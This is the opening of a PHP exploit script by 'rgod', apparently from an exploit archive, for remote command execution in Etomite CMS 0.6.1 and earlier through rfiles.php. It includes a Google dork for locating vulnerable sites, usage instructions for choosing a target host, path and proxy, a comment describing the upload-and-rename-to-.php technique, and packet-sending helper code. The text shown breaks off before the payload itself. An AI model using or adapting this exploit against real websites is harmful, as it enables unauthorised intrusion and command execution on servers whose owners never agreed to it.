1 #!/usr/bin/php −q −d short_open_tag=on
2 <?
3 echo "Etomite CMS <= 0.6.1 ’rfiles.php’ remote command execution\r\n";
4 echo "by rgod rgod@autistici.org\r\n";
5 echo "site: http://retrogod.altervista.org\r\n";
6 echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\n";
7
8 /*
9 works regardless of php.ini settings
10 */
11
12 if ($argc<4) {
13 echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
14 echo "host: target server (ip/hostname)\r\n";
15 echo "path: path to etomite\r\n";
16 echo "Options:\r\n";
17 echo " −p[port]: specify a port other than 80\r\n";
18 echo " −P[ip:port]: specify a proxy\r\n";
19 echo "Examples:\r\n";
20 echo "php ".$argv[0]." localhost /etomite/ \r\n";
21 echo "php ".$argv[0]." localhost / −P1.1.1.1:80\r\n";
22 die;
23 }
24
25 /*
26 software site: http://www.etomite.org/
27
28 explaination:
29
30 if you can call directly rfiles.php script you can upload an image file, then
31 you can rename it with .php extension, so you launch commands...
32
33 */
34
35 error_reporting(0);
36 ini_set("max_execution_time",0);
37 ini_set("default_socket_timeout",5);
38
39 function quick_dump($string)
40 {
41 $result=’’;$exa=’’;$cont=0;
42 for ($i=0; $i<=strlen($string)−1; $i++)
43 {
44 if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
45 {$result.=" .";}
46 else
47 {$result.=" ".$string[$i];}
48 if (strlen(dechex(ord($string[$i])))==2)
49 {$exa.=" ".dechex(ord($string[$i]));}
50 else
51 {$exa.=" 0".dechex(ord($string[$i]));}
52 $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
Page 1/7
Etomite CMS 0.6.1 rfiles.php Remote Command Execution Exploit
rgod
07/25/2006
53 }
54 return $exa."\r\n".$result;
55 }
56 $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
57 function sendpacketii($packet)
58 {
59 global $proxy, $host, $port, $html, $proxy_regex;
60 if ($proxy==’’) {
61 $ock=fsockopen(gethostbyname($host),$port);
62 if (!$ock) {
63 echo ’No response from ’.